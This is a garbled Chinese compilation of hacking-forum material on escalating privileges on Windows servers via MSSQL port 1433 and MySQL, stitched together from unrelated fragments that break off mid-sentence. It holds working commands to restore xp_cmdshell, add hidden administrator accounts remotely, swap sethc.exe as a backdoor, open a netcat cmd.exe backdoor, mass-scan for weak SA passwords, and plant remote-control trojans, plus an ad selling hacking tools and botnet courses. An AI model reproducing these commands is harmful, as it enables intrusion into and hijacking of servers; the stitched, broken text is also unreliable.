1433提权全教程

利用SQL之1433端口巧妙入侵服务器

利用1433端口提权

相信大家扫到很多1433 都提示用net net1 提权都说拒绝访问!且又无法上传!今天给大家针对Net没权限情况的提权方法；

1、未找到储存过程!那就来修复下吧!

用到SQL语句:

xp_cmdshell新的恢复办法

第一步先删除：

drop procedure sp_addextendedproc

drop procedure sp_oacreate

exec sp_dropextendedproc 'xp_cmdshell'

第二步恢复：

dbcc addextendedproc ("sp_oacreate","odsole70.dll")

dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

直接恢复，不管sp_addextendedproc是不是存在

图1

2、修复好了!又出现问题了!xplog70.dll被删除了!看来只有用授鱼的那修复法!图2

3、d:\应用软件\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL

找到了哈哈!

图3

4、恢复!

用到SQL语句:

第一

exec sp_dropextendedproc 'xp_cmdshell'

第二

dbcc addextendedproc ("xp_cmdshell","d:\应用软件\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL")

mysql提权种方法

（最新版3篇）

《mysql提权种方法》篇1

MySQL 提权是指通过一些技巧或漏洞来获取MySQL 数据库系统的更高权限，这种行为是违反数据库安全规定的，并且可能导致数据泄露、篡改等安全问题。因此，本文仅介绍MySQL 提权的概念和危害，不鼓励进行MySQL 提权操作。

MySQL 提权的方法有很多种，以下是一些常见的方法:

1. 弱口令或空口令漏洞：有些MySQL 数据库系统的管理员使用了弱口令或空口令，攻击者可以通过猜测或暴力破解来获取管理员权限。

2. 删除或修改用户表：攻击者可以通过删除或修改用户表中的记录，来获得更高权限或管理员权限。

3. 利用SQL 注入漏洞：攻击者可以通过SQL 注入漏洞，向MySQL 数据库中插入恶意代码，从而获取更高权限。

4. 利用MySQL 的特殊功能:MySQL 中有一些特殊的函数或操作，可以通过巧妙的组合使用来获取更高权限。

MySQL 提权是一种不道德且危险的行为，不仅违反了数据库安全规定，而且可能导致严重的安全问题。

《mysql提权种方法》篇2

MySQL 提权是指通过一些技巧或漏洞来获取MySQL 数据库的更高权限，这种行为是违法的，并且会对数据库的安全造成严重的威

胁。因此，我不会提供任何关于MySQL 提权的指导或建议。

相反，我建议您采取措施来保护MySQL 数据库的安全，例如:

1. 使用强密码，并定期更改密码。

2. 禁用或限制MySQL 中不必要的服务或功能。

3. 更新MySQL 版本以修补已知的漏洞。

4. 配置MySQL 的安全选项，例如：启用SSL，使用可靠的认证方式等。

Metasploit Framework（MSF）是一种渗透测试工具，它包括了许多模块和利用技术，其中一些专门用于在 Windows 系统上进行提权。提权是指攻击者通过某种手

段获取更高权限的过程，通常是从普通用户升级为管理员或系统用户。以下是一些在 Metasploit 中用于 Windows 提权的常见方法：

1.Local Exploits：

Metasploit 提供了一些本地漏洞利用模块，用于利用目标系统上的已知漏洞。

这些模块可能涉及到某些服务或应用程序的漏洞，通过这些漏洞攻击者可以

获得更高的权限。

例如：

2.Post Exploitation Modules：

Metasploit 还提供了一些用于后期渗透的模块，用于在系统上查找提权的机

会。这些模块通常在获取初始访问权限后运行，以寻找系统中的漏洞或弱点。

例如：

3.Token Impersonation：

在 Windows 中，通过令牌伪造（Token Impersonation）技术，攻击者可以使

用已经获得的令牌来获取更高的权限。Metasploit 提供了一些与令牌相关的

模块，用于伪造或注入令牌。

例如：

4.Exploit Suggester：

Metasploit 中的post/multi/recon/local_exploit_suggester模块用于自动检测目标系统上可能存在的提权机会。它会分析系统信息，查找可能的本地漏洞，然后建议相应的模块。

这些只是 Metasploit 中一些常见的 Windows 提权方法，实际使用时需要根据目标系统的具体情况选择适当的模块。

mysql提权种方法

MySQL提权是指在MySQL数据库中获取更高权限的过程。MySQL提权的目的是为了获取更多的操作权限，以便对数据库进行更深入的操作和控制。MySQL提权的方法有很多种，下面将介绍其中几种常用的方法。

1. 利用已有的高权限账号进行提权：在MySQL中，有些账号拥有较高的权限，如root账号。如果我们已经获取到了这些账号的访问权限，就可以通过切换到这些账号来实现提权。可以使用以下命令切换账号：

```sql

mysql> use mysql;

mysql> update user set password=PASSWORD('new_password') where user='root'; mysql> flush privileges;

```

其中，'new_password'是你想要设置的新密码。

2. 利用已存在的漏洞进行提权：MySQL中可能存在一些已知的漏洞，攻击者可以利用这些漏洞来提升自己的权限。例如，MySQL 5.0.22之前的版本中存在一个UDF提权漏洞，攻击者可以通过该漏洞加载自定义的UDF函数，从而提升自己的权限。但需要注意的是，这些漏洞通常会被官方及时修复，因此在实际操作中，应该选择目

标版本中已知的漏洞。

3. 利用系统权限提权：MySQL数据库是运行在操作系统上的，因此可以通过提升操作系统的权限来实现MySQL的提权。例如，如果攻击者已经获取了操作系统的root权限，那么他也可以直接拥有MySQL的root权限。可以使用以下命令来提升操作系统权限：

前段时间我朋友给我一个sopo的软件，说是扫1433口令的，而且猜解速度很快，我就找个服务器试了试，确实不错能扫到一些比较强点的口令。所以这段时间就玩了一下1433错误的恢复和提权。（有人可能会说了，这有啥好研究的，sa的权限直接加用户到超管不就成了吗。其实在sa权限下还是有很多的问题的大家可以捡有用的看没用的就略过吧）

下面来说sa下执行命令错误的几种情况：

1、无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126（找不到指定模块。）

这种情况比较常见的，修复起来说简单也简单，但是有条件的。这种情况要是能列出目录（用sqltools v2.0就有列目录功能）恭喜你这个有80%的情况能修复了，如果能列目录，那么只要找到xplog70.dll的路径执行以下命令就可以了。

第一步

exec sp_dropextendedproc 'xp_cmdshell' （这个命令就是删除原有的cmdshell，因为已经出错了）

第二步

dbcc addextendedproc （“xp_cmdshell”,“c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll”）

;EXEC sp_configure 'show advanced options', 0 –

当然这是sql命令，用查询分析器执行。第二步里的c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll就是xplog70.dll的路径，这个路径是比较常见的，如果c盘没有可以找找其他盘符。

点“开始”→“运行”并输入"****regedit.exe" 回车,启动注册表编辑器regedit.exe。 打开键：HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\hacker$" 5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg，用记事本分别打这几个导出的文件进行编辑，将超级用户对应的项000001F4下的键"F"的值复制，并覆盖hacker$对应的项00000409下的键"F"的值,然后再将00000409.reg与hacker.reg合并。 编辑后的hacker.reg 6、在命令行下执行net user hacker$ /del将用户hacker$删除：net user hacker$ /del 7、在regedit.exe的窗口内按F5刷新，然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可 8、到此，隐藏的超级用户hacker$已经建好了，然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINE\SAM\SAM键权限改回原来的样子（只要删除添加的帐户administrator即可）。 9、注意：隐藏的超级用户建好后，在帐户管理器看不到hacker$这个用户，在命令行用“net user”命令也看不到，但是超级用户建立以后，就不能再改密码了，如果用net user命令来改hacker$的密码的话，那么在帐户管理器中将又会看这个隐藏的超级用户了，而且不能删除。 二、如何在命令行下远程建立隐藏的超级用户 在这里将用at的命令，因为用at产生的计划任务是以系统身份运行的，所以也用不到psu.exe程序。为了能够使用at命令，肉鸡必须开有schedule的服务，如果没有开启，可用流光里带的工具netsvc.exe或sc.exe来远程启动，当然其方法也可以，只要能启动schedule服务就行。 对于命令行方式，你可以采用各种连接方式，如用SQLexec连接MSSQL的1433端口，也可以用telnet服务，只要以你能得到一个cmdshell，并且有运行at命令的权限就可以。 1、首先找到一台肉鸡，至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为administrator,密码为12345678的肉鸡，现在我们开始在命令行下远程为它建立隐藏的超级用户。（例子中的主机是我的局域网内的一台主机，我将它的ip地址改为13.50.97.238,，请勿在互联网上对号入座,以免骚扰正常的ip地址。） 2、先与肉鸡建立连接,命令为: net use \\13.50.97.238\ipc$ "12345678" /user:"administrator 3、用at命令在肉鸡上建立一个用户(如果at服务没有启动，可用小榕的netsvc.exe或sc.exe来远程启动):at \\13.50.97.238 12:51 c:\winnt\system32\net.exe user hacker$ 1234 /add 建立这个加有$符的用户名，是因为加有$符后，命令行下用net user将不显示这个用户，但在帐户管理器却能看到这个用户。 4、同样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下键值：at \\13.50.97.238 12:55 c:\winnt\regedit.exe /e hacker.

mysql提权种方法

MySQL提权是指通过一定方式获取更高的权限来操作MySQL数据库的过程。在实际应用中，我们可能会遇到需要提权的情况，例如需要进行一些高级操作或者解决一些权限不足的问题。本文将介绍一些常用的MySQL提权方法。

1. 利用已知的漏洞：MySQL作为一款常用的数据库管理系统，存在一些已知的漏洞，攻击者可以通过利用这些漏洞来提权。例如，MySQL常见的漏洞包括错误配置、未授权访问、注入漏洞等，攻击者可以通过利用这些漏洞来获取更高的权限。

2. 利用系统漏洞：除了MySQL本身的漏洞，攻击者还可以通过利用系统的漏洞来提权。例如，操作系统的漏洞、网络设备的漏洞等，攻击者可以通过利用这些漏洞来获取系统管理员权限，从而进一步提权到MySQL的管理员权限。

3. 利用系统特权用户：在MySQL中，有一些特权用户拥有更高的权限。例如，root用户是MySQL中的超级用户，拥有最高的权限。攻击者可以通过获取系统的root权限，然后利用root用户登录MySQL数据库，从而提权到最高权限。

4. 利用已知密码：有时候，系统管理员会将MySQL数据库的密码保存在明文或者弱加密的方式中，攻击者可以通过获取这些密码来提权。因此，系统管理员应该采用安全的方式来存储密码，例如使

用哈希算法进行加密。

5. 利用弱口令：一些系统管理员在设置MySQL数据库的密码时，使用了弱密码，例如使用简单的数字或字母组合。攻击者可以通过暴力破解或者字典攻击的方式来获取这些弱口令，从而提权到数据库的更高权限。因此，系统管理员应该使用复杂的密码，并定期更换密码，以增加攻击者的难度。

【web提权】

1.能不能执行cmd就看这个命令：net user，net不行就用net1，再不行就上传一个net到可写可读目录，执行/c c:\windows\temp\cookies\net1.exe user

2.当提权成功，3389没开的情况下，上传开3389的vps没成功时，试试上传rootkit.asp 用刚提权的用户登录进去就是system权限，再试试一般就可以了。

3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的，cmd.exe//cmd.txt 都可以。

4.cmd命令：systeminfo，看看有没有KB952004、KB956572、KB970483这三个补丁，如果没有，第一个是pr提权，第二个是巴西烤肉提权，第三个是iis6.0提权。

6.c:\windows\temp\cookies\ 这个目录

7.找sa密码或是root密码，直接利用大马的文件搜索功能直接搜索，超方便！

8.cmd执行exp没回显的解决方法：com路径那里输入exp路径C:\RECYCLER\pr.exe，命令那里清空(包括/c )输入”net user jianmei daxia /add”

9.增加用户并提升为管理员权限之后，如果连接不上3389，上传rootkit.asp脚本，访问会提示登录，用提权成功的账号密码登录进去就可以拥有管理员权限了。

10.有时变态监控不让添加用户，可以尝试抓管理哈希值，上传“PwDump7 破解当前管理密码(hash值)”，俩个都上传，执行PwDump7.exe就可以了，之后到网站去解密即可。11.有时增加不上用户，有可能是密码过于简单或是过于复杂，还有就是杀软的拦截，命令tasklist 查看进程

2011年最给力的黑客视频教程当年看到这个页面的时候!恭喜你成为黑客高手已经不再遥远!再问一句你想成为黑客吗?答案是必须的好了 接着看下面的内容把!2011年 各界不断打击黑客 导致很多黑客论坛都被关闭了的确2011黑客的门槛增高了不少!但是有了这些超级黑客视频教程你不再为技术而烦恼!我们收集2010-1011年 最全的黑客视频各个黑客论坛的vip教程还有黑客基础到超级黑客的电子书看视频 没软件用怎么办看着就不爽吧!为了解决这个问题 我们在2011年准备了2011年超级黑客vip终极工具包 工具之多功能更强!瞬间成为令人羡慕的xx高手!走过路过，千万不要错过!一次性购买,终身免费升级!全套高清视频教程+超级黑客vip终极工具包 独家销售,莫失建议大家安装虚拟机测试软件，不要用于非法用途，我们对于软件引起的任何后果，不承担任何责任！现在很多朋友对黑客的概念越来越模糊，会盗Q的自称是黑客，挂几个肉鸡攻击他人站点的也说自己是黑客，甚至有些大的站点挂着非常唬人的名称噱头自称自己是最大的黑客站点！人品第一，技术第二，即便是黑客信奉技术巅峰！ 激情燃烧的岁月，随时准备挑战！黑客武林到处充满着一群热血沸腾的人们由于我们付出了大量的心血和测试，所有软件的市场价在上万元！现在购买的话只要400元！如果你确认收货立即好评只要300元诚意购买联系暗月式 QQ：40497992 饭客网络黑客基础入门系列培训教程1-19饭客网络黑客基础入门系列培训教程21-40华夏黑客(77169)VIP培训教程合辑上部华夏黑客(77169)VIP培训教程合辑下部华中红客基地QQ攻防系列教程1-25华中红客基地QQ攻防系列教程26-50华中红客基地DOS命令讲解系列教程中华隐士黑客联盟远控班VIP培训教程华夏黑客联盟菜鸟基础班培训教程甲壳虫VIP批处理教程聚E视频网网吧网管系列教程黑客防线工具黑客特训班华夏黑客联盟html语言系列培训教程华中红客基地新手系列教程华夏黑客联盟html语言系列培训教程按键精灵视频教程系列华夏黑客联盟新手入门系列教程(35课全)华夏黑客联盟批处理教程黑客动画吧DOS命令讲解系列教程华中红客基地端口漏洞利用系列教程黯势黑客联盟12天菜鸟到高手的巨变教程飞飞2008完完全全学rq中华隐士黑客联盟电脑系统攻防VIP培训教程黑防提权班黑基2010年vipVBS脚本1-5黑基2010年vipVBS脚本6-9JHACKJ高级黑客攻防视频教程上部JHACKJ高级黑

需要的工具：1.s扫描器--扫描端口；2.scansql--mssql弱口令猜解工具；3.osql或者sqlcmd--连接mssql数据库并执行脚本；4.choice--延时工具(可以用ping，但choice占用cpu少)；5.若干批处理语句；第一步：扫描开放1433端口的主机；扫描开放端口的主机，利用s扫描器，s扫描器分tcp和syn两种方式：syn:s.exe syn ip1 ip2 端口号/save tcp:s.exe tcp ip1 ip2 端口号 线程数/save，xp不支持syn扫描，但是利用2003系统的文件替换后，也可以使XP系统支持syn扫描，syn扫描速度比tcp扫描速度快很多。例如要扫1433端口的话，对应修改s.exe syn ip1 ip2 1433 /save，扫到开放端口的主机后，进行下一步============================华丽的分割线================================第二步:利用检测弱口令的工具检测开放1433端口主机的mssql数据库弱口令；首先需要整理扫除开放端口主机的ip：for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txtfor /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txtfor /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>s3.txt这几句的意思是过滤掉不要的字符；for /f "delims= "%%i in(s3.txt)do (if not defined %%i set %%i=A & echo %%i>>ips.txt）这句的意思是，去掉重复的IP地址ip整理完毕之后，利用弱口令检测工具检测弱口令；@for /f %%i in (ips.txt) do start /b scan %%i这句的意思是从ips文本里面逐个提权IP地址依次利用scan这个程序检测弱口令for /f %%i in ('tasklist ^| find "WerFault.exe"') do taskkill /im %%i /f这句的意思是如果发现有提示错误进程WerFault.exe后，自动结束它call TimeSet.bat至于这个呢，就是我设置的延迟了，因为不可能一直不停的连接提取IP进行检测，那会卡死的，所以延时是必须的，@lhn /t 1/d y/n>nul这是延时一秒。检测完弱口令之后呢，就是整理扫描出来的弱口令了 也就是下一步============================华丽的分割线================================第三步：整理扫描出来的弱口令；ip exist scansql.txt 这是个判断语句，如果存在scansql.txt则执行:begin下面的内容，否则goto end，跳转到最后:end. 如果存在scansql.txt，则开始整理弱口令；setlocal enabledelayedexpansionfor /f "tokens=*" %%i in (Scansql.txt)do (set str=%%iset str=!str: Found Mssql account:=!set str=!str:/= !set str=!str:[null]=!echo !str!>>Scansql.log)这几句的意思是过滤掉“ Found Mssql account:” 、替换“/”为“”、过滤掉“[null]”并保存结果为Scansql.log@for /f "tokens=1,2,3 delims= " %%i in (Scansql.log) do @echo %%i %%j %%k>>log\Scanlog.txt这句的意思就是从Scansql.log里面提取里面的内容保存到log\Scanlog.txt文本里面@echo --------------- %date:~0,4%%date:~5,2%%date:~8,2%%time:~0,2%%t

1433提权视频动画区第一课：搭建1433扫描环境及扫描步骤 /2010/donghua/tq/1433tq1.rar 第二课：简单的1433提权 /2010/donghua/tq/1433tq2.rar 第三课：126 127等错误的修复 /2010/donghua/tq/1433tq3.rar 第四课：利用SQL综合利用工具 上传文件 手动挂马 /2010/donghua/tq/1433tq4.rar 第五课：服务器SHIFT后门提权 /2010/donghua/tq/1433tq5.rar 第六课：错误代码5的修复 /2010/donghua/tq/1433tq6.rar 第七课：利用SQL查询分离器拿服务器WEBSHELL /2010/donghua/tq/1433tq7.rar 第八课：服务器SHIFT后门之映像劫持 /2010/donghua/tq/1433tq8.rar 第九课：开启内网服务器的3389 /2010/donghua/tq/1433tq9.rar第十课：用工具对1433服务器批量上传木马及建立帐号 /2010/donghua/tq/1433tq10.rar抓鸡视频动画区2010完完全全学抓鸡系列教程（一）各种远控软件的上线/2010/donghua/zj/2010zjyi.rar2010完完全全学抓鸡系列教程（二）批量抓鸡1433端口/2010/donghua/zj/2010zjer.rar2010完完全全学抓鸡系列教程（三）批量抓鸡445端口/2010/donghua/zj/2010zjsan.rar2010完完全全学抓鸡系列教程（四）批量抓鸡135端口/2010/donghua/zj/2010zjsi.rar2010完完全全学抓鸡系列教程（五）批量2967端口抓鸡/2010/donghua/3222967zj.rar打造个人版灰鸽子视频动画区打造个人版灰鸽子第一课：思路详解及修改标题 /2010/donghua/gz/dzgrgz1.rar 打造个人版灰鸽子第二课：修改启动画面 /2010/donghua/gz/dzgrgz2.rar 打造个人版灰鸽子第三课：修改右下角图片 /2010/donghua/gz/dzgrgz3.rar 打造个人版灰鸽子第四课：修改关于里的图片 /2010/donghua/gz/dzgrgz4.rar 打造个人版灰鸽子第五课：修改灰鸽子文字信息以及超级连接 /2010/donghua/gz/dzgrgz5.rar 打造个人版灰鸽子第六课：修改灰鸽子皮肤 /2010/donghua/gz/dzgrgz6.rar 打造个人版灰鸽子第七课：修改ico图标以及3322上线 /2010/donghua/gz/dzgrgz7.rar 易语言视频动画区易语言第一课：初识易语言 /2010/donghua/e/eyy1.rar易语言第二课：基本组建的认识(编辑框 图片框 外形框) /2010/donghua/e/eyy2.zip易语言第三课：基本组建的认识(画板 分组框 标

本人专用的1433修复全部口令全集（申请点亮）

◆◆◆◆◆◆◆◆◆◆◆◆◆◆

net net1被禁止时执行CMD命令

net user Administrator$ 920517 /add

net localgroup administrators Administrator$ /add

第一步：dir net.exe /s /p 或者dir net1.exe /s /p

第二步：C:\WINDOWS\system32\dllcache\net1.exe user 123 123 /add

第三步：C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators 123 /add

◆◆◆◆◆◆◆◆◆◆◆◆◆◆

沙盘模式提权

sethc.exe禁止

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cacls c:\windows\system32\net.exe /e /t /g everyone:F')

net net1都被禁用

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("xcopy taskmgr.exe sethc.exe /y")')

No.10 VncVnc不少老外都在用，国内用的比较少，但是几率很大。==============VNC提权方法==============利用shell读取vnc保存在注册表中的密文，使用工具VNC4X破解注册表位置：HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password69 45150 96177 b1243 f3153 9989 59148 9422 16No.9 RadminRadmin 是一款很不错的服务器管理无论是远程桌面控制，还是文件传输，速度都很快，很方便。 Radmin 默认端口是4899，无密码。不过服务器注重的是安全，一定会修改默认端口和密码的，端口与密码读取位置：HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置以前我们可以用海洋木马所带的功能来读出键值,然后进行转换得到hash值,但是现在有个更方便的东西,把ASP文件传到服务器上,打开可直接读出Radmin的hash和Radmin服务端口!radmin.rar (797 Bytes) 读hash下载次数: 4昨天 22:58No.8 PcAnywherePcAnywhere是一款用得很多的远程管理软件，他有一个重大漏洞是保存远程管理员帐号的CIF文件密码，是可以被轻易解密的，如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有PCANYWhere 同时保存密码文件的目录是允许我们的IUSER权限访问，我们可以下载这个CIF文件到本地破解，再通过PCANYWhere从本机登陆服务器。思路简单而明确。Ps:保存密码的CIF文件,不是位于PCANYWhere的安装目录,而且位于安装PCANYWhere所安装盘的\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 如果PCANYWhere安装在D:\program\文件下下，那么PCANYWhere的密码文件就保存在D:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\文件夹下。No.7 搜狗输入法不少管理都使用五笔打字，不过还是有少数人喜欢用拼音，智能ABC功能少，没有全拼功能，所以大多都选择了搜狗输入法。搜狗输入法根目录下有一个：PinyinUp.exe 是用来更新词典用的，管理员为了保存词库，有可能会把搜狗输入法安装到D盘，搜狗输入法目录默认是Everyone可读可写，直接捆绑上远控等下次重启就会上线了。No.6 WinWebMail企业邮局系统 WinWebMail目录下的web必须设置everyone权限可读可写，不然邮件登陆不上去等等，所以在开始程序里找到WinWebMail快捷方式下下来，看路径，访问 路径\web传shell，访问shell后，权限是system，放远控进启动项，等待下次重启。没有删cmd组建的直接加用户。7i24的web目录也是可写，权限为administrator。No.5 NC反弹nc的使用实例c:\nc.exe -l -p 4455 -d -e cmd.exe 可以很好的隐藏一个NetCat后门。c:\nc.exe -p 4455 -d -L -e cmd.exe

MySQL提权方法

一. 概述

MySQL提权是指通过某些手段提升MySQL用户权限的过程，可以获得更高级别的权

限来执行更多的操作。在实际应用中，MySQL提权方法有很多种，本文将从几个常

用的方法出发，对其进行详细介绍和探讨。

二. 攻击前提条件

在进行MySQL提权之前，需要具备以下条件： 1. 已经成功登录MySQL数据库并具有一定权限的用户； 2. 已经获取了本地操作系统的管理员权限（root或Administrator）； 3. 对目标系统有一定的了解，并已经获取了系统信息。

三. MySQL提权方法

3.1 利用已知漏洞

利用已知的MySQL漏洞是提权的一种常见方法，需要掌握一些著名漏洞的利用方式，如MySQL允许本地用户通过socket文件连接的漏洞，可以通过在socket文件中执行系统命令来提权。

3.2 执行自定义函数

如果当前用户在MySQL中拥有CREATE ROUTINE权限，可以通过创建自定义函数的

方式来提权。自定义函数可以是一段包含系统命令的SQL语句，通过执行自定义函数可以执行系统命令，从而获取更高级别的权限。

3.3 本地文件读写

如果当前用户在MySQL中拥有FILE权限，则可以通过读取和写入本地文件来达到

提权的目的。可以通过写入一段可以执行系统命令的脚本到本地文件中，然后通过系统命令执行这个脚本来提权。

3.4 转储MySQL数据库

如果当前用户在MySQL中拥有SELECT权限，并且数据库管理员配置了mysqldump

命令的执行路径，则可以通过转储MySQL数据库的方式来提权。可以使用mysqldump命令将当前数据库的数据导出到指定的文件中，然后通过读取这个文件

关闭1433端口保障安全端口如果不是做虚拟主机的服务器。我们强列建意关闭1433端口。因此百分之九十的黑客是通过数据库提权建利管理员帐号和密码。一.创建IP筛选器和筛选器操作 1."开始"->"程序"->"管理工具"->"本地安全策略"。微软建议使用本地安全策略进行IPsec的设置，因为本地安全策略只应用到本地计算机上，而通常ipsec都是针对某台计算机量身定作的。2.右击"Ip安全策略，在本地机器"，选择"管理 IP 筛选器表和筛选器操作"，启动管理 IP 筛选器表和筛选器操作对话框。我们要先创建一个IP筛选器和相关操作才能够建立一个相应的IPsec安全策略。3.在"管理 IP 筛选器表"中，按"添加"按钮建立新的IP筛选器: 1)在跳出的IP筛选器列表对话框内，填上合适的名称，我们这儿使用"tcp1433"，描述随便填写.单击右侧的"添加"按钮，启动IP筛选器向导。 2)跳过欢迎对话框，下一步。 3)在IP通信源页面，源地方选"任何IP地址"，因为我们要阻止传入的访问。下一步。 4)在IP通信目标页面，目标地址选"我的IP地址"。下一步。 5)在IP协议类型页面，选择"TCP"。下一步。 6)在IP协议端口页面，选择"到此端口"并设置为"1433"，其它不变。下一步。 7)完成。关闭IP筛选器列表对话框。会发现tcp1433IP筛选器出现在IP筛选器列表中。4.选择"管理筛选器操作"标签，创建一个拒绝操作: 1)单击"添加"按钮，启动"筛选器操作向导"，跳过欢迎页面，下一步。 2)在筛选器操作名称页面，填写名称，这儿填写"拒绝"。下一步。 3)在筛选器操作常规选项页面，将行为设置为"阻止"。下一步。 4)完成。5.关闭"管理 IP 筛选器表和筛选器操作"对话框。二.创建IP安全策略1.右击"Ip安全策略，在本地机器"，选择"创建IP安全策略"，启动IP安全策略向导。跳过欢迎页面，下一步。2.在IP安全策略名称页面，填写合适的IP安全策略名称，这儿我们可以填写"拒绝对tcp1433端口的访问"，描述可以随便填写。下一步。3.在安全通信要求页面，不选择"激活默认响应规则"。下一步。4.在完成页面，选择"编辑属性"。完成。5.在"拒绝对tcp1433端口的访问属性"对话框中进行设置。首先设置规则: 1)单击下面的"添加 "按钮，启动安全规则向导。跳过欢迎页面，下一步。 2)在隧道终结点页面，选择默认的"此规则不指定隧道"。下一步。 3)在网络类型页面，选择默认的"所有网络连接"。下一步。 4)在身份验证方法页面，选择默认的"windows 2000默认值(Kerberos V5 协议)"。下一步。 5)在IP筛选器列表页面选择我们刚才建立的"tcp1433"筛选器。下一步。 6)在筛选器操作页面，选择我们刚才建立的"拒

菜⼑渗透提权⼩结

因为某原因搞某个站。主站搞不动，只能从⼆级域名下⼿，⼆级域名⼤多也不好搞，but，发现其中⼀个站上有其他不少旁站，于是从旁站下⼿。

拿shell⽆亮点，⼀笔带过吧，上传，bingo~

提权过程得到点⼼得和经验，重点分享下：

Shell允许跨⽬录，看了下权限，network service：

因为数据库是sqlserver，故想尝试找到数据库连接串，⽤sa来提，but：

⽤其他库的库⽤户登录可以成功，能够读库，可就是⽤sa账户登录失败，难道密码不对？或者密码过期了？

于是想上各种溢出继续XO，看了下补丁情况：

有不好的预感，结果事实就是各种本地溢出都不⽤了。

⽤ms11080时，能够进⾏到前4步，到添加⽤户和添加⽤户组时就没动静了。其他的⼯具都不能执⾏。⽤前段时间的windows全版本提权⼤0day也不好使。

Net user⼀下发现有个很奇怪的账户,其中administrator重命名了：（箭头所指⽤户名⽐较敏感，在⽹上能直接搜到域名，故打码了。望见谅。）

箭头所指⽤户名是其中⼀个旁站的⽹站⽬录名。

于是重点看⼀看：

发现是远程桌⾯组内的⽤户。

但是苦于没有密码。不过还是想上服务器看看。于是先把端⼝转出来吧。

虽然上⾯有瑞星，但妨碍不到这些⼯具。找了可读可写⽊录上传了lcx。把3389转出来。从外⾯只能看到80。其他端⼝包括1433都看不到。

上去后⼿痒随便乱试了⼀下。发现⽤密码⽤户名+123!@#居然进去了！（此处全靠⼈品！）

But进来后发现该⽤户权限⽐菜⼑还不如：

菜⼑下还能跨⽬录任意访问，⽤这个⽤户进来了却连跨盘符访问都不⾏了。